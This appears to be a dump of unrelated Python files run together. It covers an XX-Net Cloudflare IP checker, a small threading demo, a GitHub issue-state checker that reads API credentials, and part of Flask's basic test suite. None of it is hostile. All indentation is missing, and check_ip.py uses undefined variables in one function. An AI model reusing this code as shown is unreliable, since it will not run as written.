config_error_msg += '\n\n' + str(yaml_e.problem_mark)
LOGGER.error(config_error_msg)
sys.exit(1)
CONFIG = Config(config_dict)
main()
|
check_ip.py | #!/usr/bin/env python2
# coding:utf-8
import sys
import os
import json
import threading
current_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir, os.pardir))
data_path = os.path.abspath(os.path.join(root_path, os.pardir, os.pardir, 'data'))
module_data_path = os.path.join(data_path, 'x_tunnel')
python_path = os.path.abspath( os.path.join(root_path, 'python27', '1.0'))
sys.path.append(root_path)
noarch_lib = os.path.abspath( os.path.join(python_path, 'lib', 'noarch'))
sys.path.append(noarch_lib)
if sys.platform == "win32":
win32_lib = os.path.abspath( os.path.join(python_path, 'lib', 'win32'))
sys.path.append(win32_lib)
elif sys.platform.startswith("linux"):
linux_lib = os.path.abspath( os.path.join(python_path, 'lib', 'linux'))
sys.path.append(linux_lib)
elif sys.platform == "darwin":
darwin_lib = os.path.abspath( os.path.join(python_path, 'lib', 'darwin'))
sys.path.append(darwin_lib)
extra_lib = "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python"
sys.path.append(extra_lib)
import utils
import xlog
logger = xlog.getLogger("cloudflare_front")
logger.set_buffer(500)
from front_base.openssl_wrap import SSLContext
from front_base.connect_creator import ConnectCreator
from front_base.check_ip import CheckIp
from front_base.host_manager import HostManagerBase
from config import Config
def check_all_domain(check_ip):
with open(os.path.join(current_path, "front_domains.json"), "r") as fd:
content = fd.read()
cs = json.loads(content)
for host in cs:
host = "scan1." + host
res = check_ip.check_ip(ip, host=host, wait_time=wait_time)
if not res or not res.ok:
xlog.warn("host:%s fail", host)
else:
xlog.info("host:%s ok", host)
class CheckAllIp(object):
def __init__(self, check_ip, host):
self.check_ip = check_ip
self.host = host
self.lock = threading.Lock()
self.in_fd = open("good_ip.txt", "r")
self.out_fd = open(
os.path.join(module_data_path, "cloudflare_checked_ip.txt"),
"w"
)
def get_ip(self):
with self.lock:
while True:
line = self.in_fd.readline()
if not line:
raise Exception()
try:
ip = line.split()[0]
return ip
except:
continue
def write_ip(self, ip, host, handshake):
with self.lock:
self.out_fd.write("%s %s gws %d 0 0\n" % (ip, host, handshake))
self.out_fd.flush()
def checker(self):
while True:
try:
ip = self.get_ip()
except Exception as e:
xlog.info("no ip left")
return
try:
res = self.check_ip.check_ip(ip, sni=host, host=host)
except Exception as e:
xlog.warn("check fail:%s except:%r", e)
continue
if not res or not res.ok:
xlog.debug("check fail:%s fail", ip)
continue
self.write_ip(ip, res.domain, res.handshake_time)
def run(self):
for i in range(0, 10):
threading.Thread(target=self.checker).start()
def check_all_ip(check_ip):
check = CheckAllIp(check_ip, "scan1.movistar.gq")
check.run()
if __name__ == "__main__":
# case 1: only ip
# case 2: ip + domain
# connect use domain
default_ip = "141.101.120.131"
host = "xx-net.net"
if len(sys.argv) > 1:
ip = sys.argv[1]
if not utils.check_ip_valid(ip):
ip = default_ip
host = sys.argv[1]
else:
ip = default_ip
print("Usage: check_ip.py [ip] [top_domain] [wait_time=0]")
xlog.info("test ip:%s", ip)
if len(sys.argv) > 2:
host = sys.argv[2]
xlog.info("host:%s", host)
if len(sys.argv) > 3:
wait_time = int(sys.argv[3])
else:
wait_time = 0
config_path = os.path.join(module_data_path, "cloudflare_front.json")
config = Config(config_path)
openssl_context = SSLContext(logger)
host_manager = HostManagerBase()
connect_creator = ConnectCreator(logger, config, openssl_context, host_manager, debug=True)
check_ip = CheckIp(logger, config, connect_creator)
#check_all_domain(check_ip)
#check_all_ip(check_ip)
#exit(0)
res = check_ip.check_ip(ip, sni=host, host=host, wait_time=wait_time)
if not res:
xlog.warn("connect fail")
elif res.ok:
xlog.info("success, domain:%s handshake:%d", res.host, res.handshake_time)
else:
xlog.warn("not support") |
02_应用程序.py | import threading
print('666')
def func(arg):
print(arg)
t = threading.Thread(target=func, args=('kkk',))
t.start()
print('end')
|
issue.py | """For checking issue state based on supplied issue URL.
"""
import logging
import multiprocessing
import os
import re
import yaml
import requests
from abc import ABCMeta, abstractmethod
logger = logging.getLogger(__name__)
CREDENTIALS_FILE = 'credentials.yaml'
class IssueCheckerBase(object):
"""Base class for issue checker
"""
__metaclass__ = ABCMeta
def __init__(self, url):
self.url = url
@abstractmethod
def is_active(self):
"""
Check if the issue is still active
"""
return True
class GitHubIssueChecker(IssueCheckerBase):
"""GitHub issue state checker
"""
NAME = 'GitHub'
def __init__(self, url):
super(GitHubIssueChecker, self).__init__(url)
self.user = ''
self.api_token = ''
self.api_url = url.replace('github.com', 'api.github.com/repos')
self.get_cred()
def get_cred(self):
"""Get GitHub API credentials
"""
creds_folder_path = os.path.dirname(__file__)
creds_file_path = os.path.join(creds_folder_path, CREDENTIALS_FILE)
try:
with open(creds_file_path) as creds_file:
creds = yaml.safe_load(creds_file)
if creds is not None:
github_creds = creds.get(self.NAME, {})
self.user = github_creds.get('user', '')
self.api_token = github_creds.get('api_token', '')
else:
self.user = os.environ.get("GIT_USER_NAME")
self.api_token = os.environ.get("GIT_API_TOKEN")
except Exception as e:
logger.error('Load credentials from {} failed with error: {}'.format(creds_file_path, repr(e)))
def is_active(self):
"""Check if the issue is still active.
If unable to get issue state, always consider it as active.
Returns:
bool: False if the issue is closed else True.
"""
try:
response = requests.get(self.api_url, auth=(self.user, self.api_token))
response.raise_for_status()
issue_data = response.json()
if issue_data.get('state', '') == 'closed':
logger.debug('Issue {} is closed'.format(self.url))
labels = issue_data.get('labels', [])
if any(['name' in label and 'duplicate' in label['name'].lower() for label in labels]):
logger.warning('GitHub issue: {} looks like duplicate and was closed. Please re-check and ignore'
'the test on the parent issue'.format(self.url))
return False
except Exception as e:
logger.error('Get details for {} failed with: {}'.format(self.url, repr(e)))
logger.debug('Issue {} is active. Or getting issue state failed, consider it as active anyway'.format(self.url))
return True
def issue_checker_factory(url):
"""Factory function for creating issue checker object based on the domain name in the issue URL.
Args:
url (str): Issue URL.
Returns:
obj: An instance of issue checker.
"""
m = re.match('https?://([^/]+)', url)
if m and len(m.groups()) > 0:
domain_name = m.groups()[0].lower()
if 'github' in domain_name:
return GitHubIssueChecker(url)
else:
logger.error('Unknown issue website: {}'.format(domain_name))
logger.error('Creating issue checker failed. Bad issue url {}'.format(url))
return None
def check_issues(issues):
"""Check state of the specified issues.
Because issue state checking may involve sending HTTP request. This function uses parallel run to speed up
issue status checking.
Args:
issues (list of str): List of issue URLs.
Returns:
dict: Issue state check result. Key is issue URL, value is either True or False based on issue state.
"""
checkers = [c for c in [issue_checker_factory(issue) for issue in issues] if c is not None]
if not checkers:
logger.error('No checker created for issues: {}'.format(issues))
return {}
check_results = multiprocessing.Manager().dict()
check_procs = []
def _check_issue(checker, results):
results[checker.url] = checker.is_active()
for checker in checkers:
check_procs.append(multiprocessing.Process(target=_check_issue, args=(checker, check_results,)))
for proc in check_procs:
proc.start()
for proc in check_procs:
proc.join(timeout=60)
return check_results
|
test_basic.py | # -*- coding: utf-8 -*-
"""
tests.basic
~~~~~~~~~~~~~~~~~~~~~
The basic functionality.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
import re
import time
import uuid
from datetime import datetime
from threading import Thread
import pytest
import werkzeug.serving
from werkzeug.exceptions import BadRequest, Forbidden, NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
import flask
from flask._compat import text_type
def test_options_work(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
assert rv.data == b""
def test_options_on_multiple_rules(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
@app.route("/", methods=["PUT"])
def index_put():
return "Aha!"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST", "PUT"]
def test_provide_automatic_options_attr():
app = flask.Flask(__name__)
def index():
return "Hello World!"
index.provide_automatic_options = False
app.route("/")(index)
rv = app.test_client().open("/", method="OPTIONS")
assert rv.status_code == 405
app = flask.Flask(__name__)
def index2():
return "Hello World!"
index2.provide_automatic_options = True
app.route("/", methods=["OPTIONS"])(index2)
rv = app.test_client().open("/", method="OPTIONS")
assert sorted(rv.allow) == ["OPTIONS"]
def test_provide_automatic_options_kwarg(app, client):
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule("/", view_func=index, provide_automatic_options=False)
app.add_url_rule(
"/more",
view_func=more,
methods=["GET", "POST"],
provide_automatic_options=False,
)
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD"]
# Older versions of Werkzeug.test.Client don't have an options method
if hasattr(client, "options"):
rv = client.options("/")
else:
rv = client.open("/", method="OPTIONS")
assert rv.status_code == 405
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "POST"]
if hasattr(client, "options"):
rv = client.options("/more")
else:
rv = client.open("/more", method="OPTIONS")
assert rv.status_code == 405
def test_request_dispatching(app, client):
@app.route("/")
def index():
return flask.request.method
@app.route("/more", methods=["GET", "POST"])
def more():
return flask.request.method
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
def test_disallow_string_for_allowed_methods(app):
with pytest.raises(TypeError):
@app.route("/", methods="GET POST")
def index():
return "Hey"
def test_url_mapping(app, client):
random_uuid4 = "7eb41166-9ebf-4d26-b771-ea3f54f8b383"
def index():
return flask.request.method
def more():
return flask.request.method
def options():
return random_uuid4
app.add_url_rule("/", "index", index)
app.add_url_rule("/more", "more", more, methods=["GET", "POST"])
# Issue 1288: Test that automatic options are not added when non-uppercase 'options' in methods
app.add_url_rule("/options", "options", options, methods=["options"])
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
rv = client.open("/options", method="OPTIONS")
assert rv.status_code == 200
assert random_uuid4 in rv.data.decode("utf-8")
def test_werkzeug_routing(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
def bar():
return "bar"
def index():
return "index"
app.view_functions["bar"] = bar
app.view_functions["index"] = index
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_endpoint_decorator(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
@app.endpoint("bar")
def bar():
return "bar"
@app.endpoint("index")
def index():
return "index"
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_session(app, client):
@app.route("/set", methods=["POST"])
def set():
assert not flask.session.accessed
assert not flask.session.modified
flask.session["value"] = flask.request.form["value"]
assert flask.session.accessed
assert flask.session.modified
return "value set"
@app.route("/get")
def get():
assert not flask.session.accessed
assert not flask.session.modified
v = flask.session.get("value", "None")
assert flask.session.accessed
assert not flask.session.modified
return v
assert client.post("/set", data={"value": "42"}).data == b"value set"
assert client.get("/get").data == b"42"
def test_session_using_server_name(app, client):
app.config.update(SERVER_NAME="example.com")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_and_port(app, client):
app.config.update(SERVER_NAME="example.com:8080")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_port_and_path(app, client):
app.config.update(SERVER_NAME="example.com:8080", APPLICATION_ROOT="/foo")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/foo")
assert "domain=example.com" in rv.headers["set-cookie"].lower()
assert "path=/foo" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_application_root(app, client):
class PrefixPathMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ["SCRIPT_NAME"] = self.prefix
return self.app(environ, start_response)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, "/bar")
app.config.update(APPLICATION_ROOT="/bar")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "path=/bar" in rv.headers["set-cookie"].lower()
def test_session_using_session_settings(app, client):
app.config.update(
SERVER_NAME="www.example.com:8080",
APPLICATION_ROOT="/test",
SESSION_COOKIE_DOMAIN=".example.com",
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_SAMESITE="Lax",
SESSION_COOKIE_PATH="/",
)
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://www.example.com:8080/test/")
cookie = rv.headers["set-cookie"].lower()
assert "domain=.example.com" in cookie
assert "path=/" in cookie
assert "secure" in cookie
assert "httponly" not in cookie
assert "samesite" in cookie
def test_session_using_samesite_attribute(app, client):
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
app.config.update(SESSION_COOKIE_SAMESITE="invalid")
with pytest.raises(ValueError):
client.get("/")
app.config.update(SESSION_COOKIE_SAMESITE=None)
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite" not in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Strict")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=strict" in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Lax")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=lax" in cookie
def test_session_localhost_warning(recwarn, app, client):
app.config.update(SERVER_NAME="localhost:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://localhost:5000/")
assert "domain" not in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert '"localhost" is not a valid cookie domain' in str(w.message)
def test_session_ip_warning(recwarn, app, client):
app.config.update(SERVER_NAME="127.0.0.1:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://127.0.0.1:5000/")
assert "domain=127.0.0.1" in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "cookie domain is an IP" in str(w.message)
def test_missing_session(app):
app.secret_key = None
def expect_exception(f, *args, **kwargs):
e = pytest.raises(RuntimeError, f, *args, **kwargs)
assert e.value.args and "session is unavailable" in e.value.args[0]
with app.test_request_context():
assert flask.session.get("missing_key") is None
expect_exception(flask.session.__setitem__, "foo", 42)
expect_exception(flask.session.pop, "foo")
def test_session_expiration(app, client):
permanent = True
@app.route("/")
def index():
flask.session["test"] = 42
flask.session.permanent = permanent
return ""
@app.route("/test")
def test():
return text_type(flask.session.permanent)
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"(?i)\bexpires=([^;]+)", rv.headers["set-cookie"])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
assert expires.year == expected.year
assert expires.month == expected.month
assert expires.day == expected.day
rv = client.get("/test")
assert rv.data == b"True"
permanent = False
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"\bexpires=([^;]+)", rv.headers["set-cookie"])
assert match is None
def test_session_stored_last(app, client):
@app.after_request
def modify_session(response):
flask.session["foo"] = 42
return response
@app.route("/")
def dump_session_contents():
return repr(flask.session.get("foo"))
assert client.get("/").data == b"None"
assert client.get("/").data == b"42"
def test_session_special_types(app, client):
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.route("/")
def dump_session_contents():
flask.session["t"] = (1, 2, 3)
flask.session["b"] = b"\xff"
flask.session["m"] = flask.Markup("<html>")
flask.session["u"] = the_uuid
flask.session["d"] = now
flask.session["t_tag"] = {" t": "not-a-tuple"}
flask.session["di_t_tag"] = {" t__": "not-a-tuple"}
flask.session["di_tag"] = {" di": "not-a-dict"}
return "", 204
with client:
client.get("/")
s = flask.session
assert s["t"] == (1, 2, 3)
assert type(s["b"]) == bytes
assert s["b"] == b"\xff"
assert type(s["m"]) == flask.Markup
assert s["m"] == flask.Markup("<html>")
assert s["u"] == the_uuid
assert s["d"] == now
assert s["t_tag"] == {" t": "not-a-tuple"}
assert s["di_t_tag"] == {" t__": "not-a-tuple"}
assert s["di_tag"] == {" di": "not-a-dict"}
def test_session_cookie_setting(app):
is_permanent = True
@app.route("/bump")
def bump():
rv = flask.session["foo"] = flask.session.get("foo", 0) + 1
flask.session.permanent = is_permanent
return str(rv)
@app.route("/read")
def read():
return str(flask.session.get("foo", 0))
def run_test(expect_header):
with app.test_client() as c:
assert c.get("/bump").data == b"1"
assert c.get("/bump").data == b"2"
assert c.get("/bump").data == b"3"
rv = c.get("/read")
set_cookie = rv.headers.get("set-cookie")
assert (set_cookie is not None) == expect_header
assert rv.data == b"3"
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=True)
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
def test_session_vary_cookie(app, client):
@app.route("/set")
def set_session():
flask.session["test"] = "test"
return ""
@app.route("/get")
def get():
return flask.session.get("test")
@app.route("/getitem")
def getitem():
return flask.session["test"]
@app.route("/setdefault")
def setdefault():
return flask.session.setdefault("test", "default")
@app.route("/vary-cookie-header-set")
def vary_cookie_header_set():
response = flask.Response()
response.vary.add("Cookie")
flask.session["test"] = "test"
return response
@app.route("/vary-header-set")
def vary_header_set():
response = flask.Response()
response.vary.update(("Accept-Encoding", "Accept-Language"))
flask.session["test"] = "test"
return response
@app.route("/no-vary-header")
def no_vary_header():
return ""
def expect(path, header_value="Cookie"):
rv = client.get(path)
if header_value:
# The 'Vary' key should exist in the headers only once.
assert len(rv.headers.get_all("Vary")) == 1
assert rv.headers["Vary"] == header_value
else:
assert "Vary" not in rv.headers
expect("/set")
expect("/get")
expect("/getitem")
expect("/setdefault")
expect("/vary-cookie-header-set")
expect("/vary-header-set", "Accept-Encoding, Accept-Language, Cookie")
expect("/no-vary-header", None)
def test_flashes(app, req_ctx):
assert not flask.session.modified
flask.flash("Zap")
flask.session.modified = False
flask.flash("Zip")
assert flask.session.modified
assert list(flask.get_flashed_messages()) == ["Zap", "Zip"]
def test_extended_flashing(app):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
@app.route("/")
def index():
flask.flash(u"Hello World")
flask.flash(u"Hello World", "error")
flask.flash(flask.Markup(u"<em>Testing</em>"), "warning")
return ""
@app.route("/test/")
def test():
messages = flask.get_flashed_messages()
assert list(messages) == [
u"Hello World",
u"Hello World",
flask.Markup(u"<em>Testing</em>"),
]
return ""
@app.route("/test_with_categories/")
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
assert len(messages) == 3
assert list(messages) == [
("message", u"Hello World"),
("error", u"Hello World"),
("warning", flask.Markup(u"<em>Testing</em>")),
]
return ""
@app.route("/test_filter/")
def test_filter():
messages = flask.get_flashed_messages(
category_filter=["message"], with_categories=True
)
assert list(messages) == [("message", u"Hello World")]
return ""
@app.route("/test_filters/")
def test_filters():
messages = flask.get_flashed_messages(
category_filter=["message", "warning"], with_categories=True
)
assert list(messages) == [
("message", u"Hello World"),
("warning", flask.Markup(u"<em>Testing</em>")),
]
return ""
@app.route("/test_filters_without_returning_categories/")
def test_filters2():
messages = flask.get_flashed_messages(category_filter=["message", "warning"])
assert len(messages) == 2
assert messages[0] == u"Hello World"
assert messages[1] == flask.Markup(u"<em>Testing</em>")
return ""
# Create new test client on each test to clean flashed messages.
client = app.test_client()
client.get("/")
client.get("/test_with_categories/")
client = app.test_client()
client.get("/")
client.get("/test_filter/")
client = app.test_client()
client.get("/")
client.get("/test_filters/")
client = app.test_client()
client.get("/")
client.get("/test_filters_without_returning_categories/")
def test_request_processing(app, client):
evts = []
@app.before_request
def before_request():
evts.append("before")
@app.after_request
def after_request(response):
response.data += b"|after"
evts.append("after")
return response
@app.route("/")
def index():
assert "before" in evts
assert "after" not in evts
return "request"
assert "after" not in evts
rv = client.get("/").data
assert "after" in evts
assert rv == b"request|after"
def test_request_preprocessing_early_return(app, client):
evts = []
@app.before_request
def before_request1():
evts.append(1)
@app.before_request
def before_request2():
evts.append(2)
return "hello"
@app.before_request
def before_request3():
evts.append(3)
return "bye"
@app.route("/")
def index():
evts.append("index")
return "damnit"
rv = client.get("/").data.strip()
assert rv == b"hello"
assert evts == [1, 2]
def test_after_request_processing(app, client):
@app.route("/")
def index():
@flask.after_this_request
def foo(response):
response.headers["X-Foo"] = "a header"
return response
return "Test"
resp = client.get("/")
assert resp.status_code == 200
assert resp.headers["X-Foo"] == "a header"
def test_teardown_request_handler(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_debug_mode(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_error(app, client):
called = []
app.testing = False
@app.teardown_request
def teardown_request1(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.teardown_request
def teardown_request2(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.route("/")
def fails():
1 // 0
rv = client.get("/")
assert rv.status_code == 500
assert b"Internal Server Error" in rv.data
assert len(called) == 2
def test_before_after_request_order(app, client):
called = []
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route("/")
def index():
return "42"
rv = client.get("/")
assert rv.data == b"42"
assert called == [1, 2, 3, 4, 5, 6]
def test_error_handling(app, client):
app.testing = False
@app.errorhandler(404)
def not_found(e):
return "not found", 404
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.errorhandler(Forbidden)
def forbidden(e):
return "forbidden", 403
@app.route("/")
def index():
flask.abort(404)
@app.route("/error")
def error():
1 // 0
@app.route("/forbidden")
def error2():
flask.abort(403)
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"not found"
rv = client.get("/error")
assert rv.status_code == 500
assert b"internal server error" == rv.data
rv = client.get("/forbidden")
assert rv.status_code == 403
assert b"forbidden" == rv.data
def test_error_handler_unknown_code(app):
with pytest.raises(KeyError) as exc_info:
app.register_error_handler(999, lambda e: ("999", 999))
assert "Use a subclass" in exc_info.value.args[0]
def test_error_handling_processing(app, client):
app.testing = False
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.route("/")
def broken_func():
1 // 0
@app.after_request
def after_request(resp):
resp.mimetype = "text/x-special"
return resp
resp = client.get("/")
assert resp.mimetype == "text/x-special"
assert resp.data == b"internal server error"
def test_baseexception_error_handling(app, client):
app.testing = False
@app.route("/")
def broken_func():
raise KeyboardInterrupt()
with pytest.raises(KeyboardInterrupt):
client.get("/")
ctx = flask._request_ctx_stack.top
assert ctx.preserved
assert type(ctx._preserved_exc) is KeyboardInterrupt
def test_before_request_and_routing_errors(app, client):
@app.before_request
def attach_something():
flask.g.something = "value"
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"value"
def test_user_error_handling(app, client):
class MyException(Exception):
pass
@app.errorhandler(MyException)
def handle_my_exception(e):
assert isinstance(e, MyException)
return "42"
@app.route("/")
def index():
raise MyException()
assert client.get("/").data == b"42"
def test_http_error_subclass_handling(app, client):
class ForbiddenSubclass(Forbidden):
pass
@app.errorhandler(ForbiddenSubclass)
def handle_forbidden_subclass(e):
assert isinstance(e, ForbiddenSubclass)
return "banana"
@app.errorhandler(403)
def handle_forbidden_subclass(e):
assert not isinstance(e, ForbiddenSubclass)
assert isinstance(e, Forbidden)
return "apple"
@app.route("/1")
def index1():
raise ForbiddenSubclass()
@app.route("/2")
def index2():
flask.abort(403)
@app.route("/3")
def index3():
raise Forbidden()
assert client.get("/1").data == b"banana"
assert client.get("/2").data == b"apple"
assert client.get("/3").data == b"apple"
def test_errorhandler_precedence(app, client):
class E1(Exception):
pass
class E2(Exception):
pass
class E3(E1, E2):
pass
@app.errorhandler(E2)
def handle_e2(e):
return "E2"
@app.errorhandler(Exception)
def handle_exception(e):
return "Exception"
@app.route("/E1")
def raise_e1():
raise E1
@app.route("/E3")
def raise_e3():
raise E3
rv = client.get("/E1")
assert rv.data == b"Exception"
rv = client.get("/E3")
assert rv.data == b"E2"
def test_trapping_of_bad_request_key_errors(app, client):
@app.route("/key")
def fail():
flask.request.form["missing_key"]
@app.route("/abort")
def allow_abort():
flask.abort(400)
rv = client.get("/key")
assert rv.status_code == 400
assert b"missing_key" not in rv.data
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = True
with pytest.raises(KeyError) as e:
client.get("/key")
assert e.errisinstance(BadRequest)
assert "missing_key" in e.value.get_description()
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = False
app.config["TRAP_BAD_REQUEST_ERRORS"] = True
with pytest.raises(KeyError):
client.get("/key")
with pytest.raises(BadRequest):
client.get("/abort")
def test_trapping_of_all_http_exceptions(app, client):
app.config["TRAP_HTTP_EXCEPTIONS"] = True
@app.route("/fail")
def fail():
flask.abort(404)
with pytest.raises(NotFound):
client.get("/fail")
def test_error_handler_after_processor_error(app, client):
app.testing = False
@app.before_request
def before_request():
if trigger == "before":
1 // 0
@app.after_request
def after_request(response):
if trigger == "after":
1 // 0
return response
@app.route("/")
def index():
return "Foo"
@app.errorhandler(500)
def internal_server_error(e):
return "Hello Server Error", 500
for trigger in "before", "after":
rv = client.get("/")
assert rv.status_code == 500
assert rv.data == b"Hello Server Error"
def test_enctype_debug_helper(app, client):
from flask.debughelpers import DebugFilesKeyError
app.debug = True
@app.route("/fail", methods=["POST"])
def index():
return flask.request.files["foo"].filename
# with statement is important because we leave an exception on the
# stack otherwise and we want to ensure that this is not the case
# to not negatively affect other tests.
with client:
with pytest.raises(DebugFilesKeyError) as e:
client.post("/fail", data={"foo": "index.txt"})
assert "no file contents were transmitted" in str(e.value)
assert 'This was submitted: "index.txt"' in str(e.value)
def test_response_types(app, client):
@app.route("/text")
def from_text():
return u"Hällo Wörld"
@app.route("/bytes")
def from_bytes():
return u"Hällo Wörld".encode("utf-8")
@app.route("/full_tuple")
def from_full_tuple():
return (
"Meh",
400,
{"X-Foo": "Testing", "Content-Type": "text/plain; charset=utf-8"},
)
@app.route("/text_headers")
def from_text_headers():
return "Hello", {"X-Foo": "Test", "Content-Type": "text/plain; charset=utf-8"}
@app.route("/text_status")
def from_text_status():
return "Hi, status!", 400
@app.route("/response_headers")
def from_response_headers():
return (
flask.Response("Hello world", 404, {"X-Foo": "Baz"}),
{"X-Foo": "Bar", "X-Bar": "Foo"},
)
@app.route("/response_status")
def from_response_status():
return app.response_class("Hello world", 400), 500
@app.route("/wsgi")
def from_wsgi():
return NotFound()
assert client.get("/text").data == u"Hällo Wörld".encode("utf-8")
assert client.get("/bytes").data == u"Hällo Wörld".encode("utf-8")
rv = client.get("/full_tuple")
assert rv.data == b"Meh"
assert rv.headers["X-Foo"] == "Testing"
assert rv.status_code == 400
assert rv.mimetype == "text/plain"
rv = client.get("/text_headers")
assert rv.data == b"Hello"
assert rv.headers["X-Foo"] == "Test"
assert rv.status_code == 200
assert rv.mimetype == "text/plain"
rv = client.get("/text_status")
assert rv.data == b"Hi, status!"
assert rv.status_code == 400
assert rv.mimetype == "text/html"
rv = client.get("/response_headers")
assert rv.data == b"Hello world"
assert rv.headers.getlist("X-Foo") == ["Baz", "Bar"]
assert rv.headers["X-Bar"] == "Foo"
assert rv.status_code == 404
rv = client.get("/response_status")
assert rv.data == b"Hello world"
assert rv.status_code == 500
rv = client.get("/wsgi")
assert b"Not Found" in rv.data
assert rv.status_code == 404
def test_response_type_errors():
app = flask.Flask(__name__)
app.testing = True
